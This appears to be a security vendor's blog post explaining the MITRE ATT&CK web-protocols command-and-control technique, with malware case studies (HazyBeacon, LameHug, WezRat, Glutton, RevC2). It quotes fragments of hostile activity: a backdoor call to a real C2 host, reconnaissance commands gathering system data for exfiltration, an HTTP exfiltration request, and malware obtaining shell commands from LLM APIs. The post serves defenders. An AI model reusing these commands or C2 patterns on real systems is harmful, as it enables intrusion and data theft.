.svg)
.svg)
T1071.001 Web Protocols in MITRE ATT&CK Explained
| March 16, 2026
What Is T1071.001 Web Protocols in MITRE ATT&CK?
T1071.001 Web Protocols is a technique in the MITRE ATT&CK framework under the Command and Control tactic. It refers to the use of web protocols like HTTP, HTTPS, and WebSocket for transmitting data over the internet.
These protocols define the rules and standards for data exchange between systems, enabling structured and secure communication for web access and real-time interactions. HTTP and HTTPS are commonly used for web browsing, while WebSocket facilitates bidirectional, real-time communication. Their widespread usage across internet-based services and applications makes them crucial for normal operations and an attractive channel for adversaries to blend malicious activities with legitimate traffic.
To read about other sub-techniques of the T1071 Application Layer Protocols technique, you can visit the related hub blog.
Adversary Use of T1071.001 Web Protocols
Attackers increasingly rely on common web protocols such as HTTP, HTTPS, and WebSocket to run their command-and-control operations. Because these protocols underpin nearly all modern internet traffic, malicious activity hidden inside them is difficult to distinguish from normal user behavior. HTTP and HTTPS let infected systems retrieve commands or exfiltrate data while appearing to make routine web requests; the use of HTTPS in particular obscures the contents of those requests from inspection. WebSocket takes this even further by offering a persistent, bidirectional channel that supports continuous tasking and data transfer without the noise of repeated polling.
This shift toward blending into trusted web traffic is reflected in broader threat-intelligence trends. FortiGuard Labs' 2025 Global Threat Landscape report highlights a rise in "living-off-the-land" techniques and the growing use of encrypted, SSL-based command-and-control [1]. Together, these indicators show that adversaries are steadily moving toward web-protocol C2 to improve stealth, reduce detection opportunities, and bypass traditional perimeter defenses.
Procedure Examples Used by Adversaries in Red Report 2026
C2 Disguise: Hiding Commands within Trusted Cloud URLs
For instance, as reported in July 2025, the HazyBeacon backdoor does not communicate with a traditional C2 domain. Instead, it sends and receives commands entirely through an AWS Lambda URL, which operates as a standard HTTPS endpoint [2]:
|
<redacted>.lambda-url.ap-southeast-1.on.aws |
This has several stealth benefits:
- Communication appears as legitimate traffic to amazonaws[.]com
- HTTPS encrypts all content, preventing inspection of the commands or payloads
- The Lambda URL behaves like any normal web server, using standard methods (GET/POST)
- No unusual ports or protocols are used, everything blends into normal enterprise traffic
This is a textbook example of adversarial use of web protocols for covert C2.
HTTPS for Dynamic C2 Commands
Another example is coming from an analysis performed in December 2025 [3]. The LameHug and MalTerminal malware use HTTPS over port 443 to communicate with public LLM APIs (like those hosted by HuggingFace or OpenAI).
The adversary's goal is to hinder static analysis by concealing reconnaissance prompts within normal-looking traffic. The malware issues its reconnaissance prompts, effectively functioning as command-and-control instructions, inside standard HTTPS requests, while the malicious Windows commands that form the actual C2 payload are delivered in the corresponding HTTPS responses. Because most organizations do not inspect encrypted traffic destined for reputable cloud services, this activity typically passes through firewalls without scrutiny.
|
Disclaimer: LameHug and MalTerminal should not be classified as LLM-based AI malware. Their design reflects hardcoded command execution mediated through external services, introducing unnecessary latency, external dependencies, and multiple failure modes. Reliance on third-party APIs creates opportunities for defender disruption, increases observable network activity, and introduces risks such as inconsistent responses and delayed execution. Rather than enhancing operational capability, this approach degrades reliability and operational security. A conventional, locally implemented command structure would have been more efficient, suggesting the use of AI in this context is largely superficial rather than functionally justified. |
The LameHug malware uses the following Python function to construct and send the API call, requesting Windows shell commands from the LLM (Qwen/Qwen2.5-Coder-32B-Instruct):
|
def LLM_QUERY_EX(): |
The LLM's HTTPS response delivers the actual malicious payload as a single line of commands, which is then executed on the compromised host (llm_query1 and llm_query2 below):
|
llm_query1: mkdir C:\Programdata\info && systeminfo >> C:\Programdata\info\info.txt && wmic computersystem get name,domain > |
Procedure Examples Used by Adversaries in Red Report 2025
For instance, reported in November 2024, the WezRat malware establishes its Command and Control (C2) communication using HTTPS as part of its infection chain. After the phishing email tricks the victim into visiting the malicious lookalike site (il-cert[.]net), they are prompted to download a fake Google Chrome Installer.msi. This MSI file not only delivers a legitimate Chrome installer but also drops and executes a malicious backdoor, Updater.exe, with C2 server arguments [4].
|
"C:\Program Files (x86)\Google\Update\Updater.exe" connect.il-cert.net 8765 |
The backdoor uses the HTTPS protocol to communicate securely with the C2 server located at connect.il-cert[.]net. This communication involves sending system information, receiving encrypted commands, and exfiltrating stolen data. By leveraging HTTPS, WezRat ensures that its traffic remains encrypted, allowing it to evade detection by security tools that rely on inspecting plain network traffic. The encryption masks malicious activity as legitimate web traffic, further complicating identification and blocking.
In the case of Glutton malware, discovered in December 2024, HTTP is central to its modular attack framework [5]. The malware periodically polls a C2 server using standard HTTP GET or POST requests to fetch updated commands or additional payloads. Once downloaded, these payloads are executed to enable file operations, collect system information, or inject code into frameworks like Laravel and ThinkPHP.
Notably, Glutton does not encrypt its C2 traffic, relying on clear-text HTTP to deliver task instructions and new modules. The malware mimics legitimate web traffic by embedding commands within HTTP headers or responses and using periodic polling to avoid detection.
For example, in the following HTTP POST request, the malware exfiltrates collected data, such as stolen files or credentials, to the C2 server:
|
POST /data/upload HTTP/1.1 |
In response, the C2 server can deliver commands to the malware, such as:
|
{"command":"exec","payload":"ls -al"} |
This demonstrates HTTP's technical versatility for enabling discreet, modular, and persistent C2 operations.
In another case, between August and October 2024, the RevC2 backdoor was identified, utilizing WebSockets—a protocol that operates over HTTP/S—for C2 communication [6]. At a technical level, RevC2 adopts WebSocket for its communication channel, which is an extension of HTTP but allows for full-duplex, real-time communication between the malware (acting as a client) and the C2 server. The initial WebSocket connection begins with an HTTP-based handshake: the malware sends an HTTP request to the C2 server containing an Upgrade header, signaling the intention to establish a WebSocket connection. Once the server responds with a 101 Switching Protocols status, the connection upgrades from HTTP to WebSocket, enabling continuous two-way communication without the overhead of repeatedly establishing new HTTP connections.
WebSocket's nature gives RevC2 a significant advantage for stealth and efficiency. Unlike conventional HTTP, where each command requires a separate request and response, WebSocket maintains a persistent connection, allowing the malware to send and receive data seamlessly over a single channel. This avoids frequent connection attempts that might raise suspicions. Additionally, WebSocket traffic is indistinguishable from legitimate web traffic in many environments because it uses the same ports as HTTP (port 80) or HTTPS (port 443) and often leverages encrypted WebSocket Secure (WSS) communication. This makes deep-packet inspection tools less effective at detecting malicious activity.
Validate Your Defenses Against the Red Report 2026 Threats
References
[1] “[No title].” Available: https://www.fortinet.com/content/dam/fortinet/assets/threat-reports/threat-landscape-report-2025.pdf. [Accessed: Dec. 08, 2025]
[2] L. Rochberger, “Behind the Clouds: Attackers Targeting Governments in Southeast Asia Implement Novel Covert C2 Communication,” Unit 42, Jul. 14, 2025. Available: https://unit42.paloaltonetworks.com/windows-backdoor-for-novel-c2-communication/. [Accessed: Dec. 08, 2025]
[3] P. Labs, “Malicious AI Exposed: WormGPT, MalTerminal, and LameHug,” Dec. 06, 2025. Available: https://www.picussecurity.com/resource/blog/malicious-ai-exposed-wormgpt-malterminal-and-lamehug. [Accessed: Dec. 08, 2025]
[4] “Malware Spotlight: A Deep-Dive Analysis of WezRat,” Check Point Research, Nov. 14, 2024. Available: https://research.checkpoint.com/2024/wezrat-malware-deep-dive/. [Accessed: Dec. 17, 2024]
[5] The Hacker News, “New Glutton Malware Exploits Popular PHP Frameworks Like Laravel and ThinkPHP,” The Hacker News, Dec. 16, 2024. Available: https://thehackernews.com/2024/12/new-glutton-malware-exploits-popular.html. [Accessed: Dec. 17, 2024]
[6] I. V. A. Muhammed, “Unveiling RevC2 and Venom Loader,” Dec. 02, 2024. Available: https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader. [Accessed: Dec. 17, 2024]
